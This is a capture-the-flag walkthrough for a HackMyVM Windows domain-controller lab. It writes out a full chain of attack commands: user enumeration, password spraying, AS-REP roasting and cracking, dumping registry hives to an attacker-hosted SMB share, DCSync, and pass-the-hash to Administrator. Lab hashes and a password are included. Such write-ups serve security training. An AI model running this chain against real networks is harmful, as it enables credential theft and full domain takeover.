Dc02November 18, 2024 Created by Page Difficulty OS josemlwdf HackMyVm Medium Windows I start with a scan of the open ports. nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.4 -oG scan I continue with a scan of the versions and technologies that are running on the open ports that we have found. nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49671,49686 -sCV -Pn 10.0.2.4 -oN ports Using kerbrute I search for valid users in the system. ./kerbrute_linux_386 userenum --dc 10.0.2.5 -d SOUPEDECODE.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt With the found users I check if any of them have the same user name as their password. I find that charlie meets this and then I can list resources by smb. netexec smb 10.0.2.5 -u users -p users --continue-on-success | grep -v "[-]" By having read permissions on the IPC$ folder, I can list system users. I pass the users found by kerbrute in case any user uses as password the same user name but this time I can not find any. impacket-lookupsid SOUPEDECODE.LOCAL/charlie:charlie@10.0.2.5 /opt/kerbrute_linux_386 userenum --dc 10.0.2.5 -d SOUPEDECODE.LOCAL -u usuarios valid_users -p valid_users netexec smb 10.0.2.5 -u valid_users -p valid_users --continue-on-success | grep -v "[-]" I am trying to get TGT tickets from users that have “Do not require Kerberos preauthentication” set. I get an encrypted hash of the user zximena448. impacket-GetNPUsers SOUPEDECODE.LOCAL/ -no-pass -usersfile valid_users | grep -v "[-]" I try to crack the hash and get the user’s password in clear text. john --wordlist=/usr/share/wordlist/rockyou.txt asrproast With this new credential I check if I can list resources by smb. Seeing that I am able to list all the shared folders I move to this user’s desktop and get to read the first flag. With these credentials I enumerate the system and I see that the user zximena448 belongs to the “Backup Operators” group. Thanks to this I can make copies and restore any file on the system. ldapdomaindump -u 'SOUPEDECODE.LOCAL\zximena448' -p 'internet' 10.0.2.6 I share a resource by smb on my machine to make a copy of system, security and sam from the victim to my machine. To do this I make use of the tool backup_dc_registry and then with secretsdump I show the system hashes. impacket-smbserver recurso $(pwd) -smb2support ./reg.py zximena448:'internet'@10.0.2.5 backup -p '\\10.0.2.15\recurso' impacket-secretsdump LOCAL -system SYSTEM -security SECURITY -sam SAM With the hash found for the user MACHINE.ACC I check if it belongs to any of the previously found users. I see that it is valid for user DC01$. crackmapexec smb 10.0.2.5 -u /home/rufo/nmap/users -H "e74903d9cb1e9cc65339d50fe168a349" | grep -v "[-]" With these credentials I do a DCSync attack and manage to obtain all the hashes of the system. netexec smb 10.0.2.5 -u "DC01$" -H "e74903d9cb1e9cc65339d50fe168a349" --ntds I do pass-the-hash (PtH) with the Administrator users and I manage to read the second flag. evil-winrm -i 10.0.2.5 -u Administrator -H "8982babd4da89d33210779a6c5b078bd"